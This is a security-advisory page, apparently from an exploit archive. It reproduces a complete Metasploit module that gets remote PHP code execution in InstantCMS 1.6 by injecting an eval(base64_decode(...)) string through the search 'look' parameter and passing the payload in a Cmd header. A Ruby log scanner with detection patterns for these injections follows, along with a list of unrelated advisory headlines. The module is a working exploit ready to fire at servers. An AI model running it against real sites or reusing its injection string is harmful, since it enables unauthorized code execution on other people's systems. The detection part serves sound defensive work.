The goal of this project is to make the virtual world a safer and better place, without child pornography, major computer crime and RIAA.
07/05/2013

InstantCMS 1.6 Remote PHP Code Execution

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'InstantCMS 1.6 Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary php command execution vulnerability, because of a
        dangerous use of eval(), in InstantCMS versions 1.6.
      },
      'Author'         =>
        [
          'AkaStep', # Vulnerability discovery and PoC
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '60816' ],
          [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ]
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'InstantCMS 1.6', { }  ],
        ],
      'DisclosureDate' => 'Jun 26 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'  => 'search',
        'query' => '${echo phpinfo()}'
      }
    })

    if res
      if res.body.match(/Build Date/)
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
    else
      return Exploit::CheckCode::Unknown
    end

  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    return Exploit::CheckCode::Unknown
  end

  def exploit

    print_status("Executing payload...")

    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'  => 'search',
        'query' => rand_text_alpha(3 + rand(3)),
        'look'  => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"
      },
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })

  end
end
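
For defenders, the requests this module sends leave a recognisable trace in web server access logs: `view=search` together with PHP constructs in the `query` or `look` parameter. The scanner below is an added example, not part of the module or of InstantCMS; the log lines are constructed samples and the indicator names are hypothetical labels chosen here.

```ruby
require 'uri'

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = <<~'LOG'
  192.0.2.10 - - [05/Jul/2013:10:00:01 +0000] "GET /?view=search&query=holiday+photos HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  192.0.2.77 - - [05/Jul/2013:10:02:13 +0000] "GET /?view=search&query=%24%7Becho+phpinfo%28%29%7D HTTP/1.1" 200 70211 "-" "Mozilla/4.0"
  192.0.2.77 - - [05/Jul/2013:10:02:40 +0000] "GET /?view=search&query=abcd&look=xyz%22%2C%22%22%29%3B+eval%28base64_decode%28%24_SERVER%5BHTTP_CMD%5D%29%29%3B%2F%2F HTTP/1.1" 200 312 "-" "Mozilla/4.0"
  192.0.2.10 - - [05/Jul/2013:10:03:00 +0000] "GET /?view=content&look=eval HTTP/1.1" 200 900 "-" "Mozilla/5.0"
LOG

# Server-side PHP constructs that have no place in a search parameter.
# The tag names are labels made up for this example.
INDICATORS = {
  'php_eval'          => /\beval\s*\(/i,
  'base64_decode'     => /base64_decode\s*\(/i,
  'superglobal'       => /\$_(SERVER|GET|POST|REQUEST|COOKIE)\b/i,
  'php_interpolation' => /\$\{/
}.freeze

# Captures the request target from the quoted request line of a log entry.
REQUEST_RE = %r{"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"}

# Returns a finding hash for a suspicious line, or nil for a clean one.
def scan_line(line)
  target = line[REQUEST_RE, 1] or return nil
  query = target.split('?', 2)[1] or return nil
  params = URI.decode_www_form(query).to_h # percent-decodes; '+' becomes a space
  return nil unless params['view'] == 'search'

  hits = %w[query look].flat_map do |name|
    value = params[name].to_s
    INDICATORS.select { |_tag, re| value.match?(re) }.keys.map { |tag| "#{name}:#{tag}" }
  end
  hits.empty? ? nil : { client: line[/\A\S+/], request: target, hits: hits }
rescue ArgumentError
  # Malformed percent-encoding: surface it for manual review instead of dropping it.
  { client: line[/\A\S+/], request: target, hits: ['malformed_encoding'] }
end

# Scans a whole log and returns only the lines that produced a finding.
def scan_log(text)
  text.each_line.map { |line| scan_line(line) }.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |f| puts "#{f[:client]} #{f[:hits].join(',')} #{f[:request]}" }
end
```

The module carries its payload in the `Cmd` request header, which default access-log formats do not record, so the query string is the only part of the request such logs can be matched on.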

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

An SQL injection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015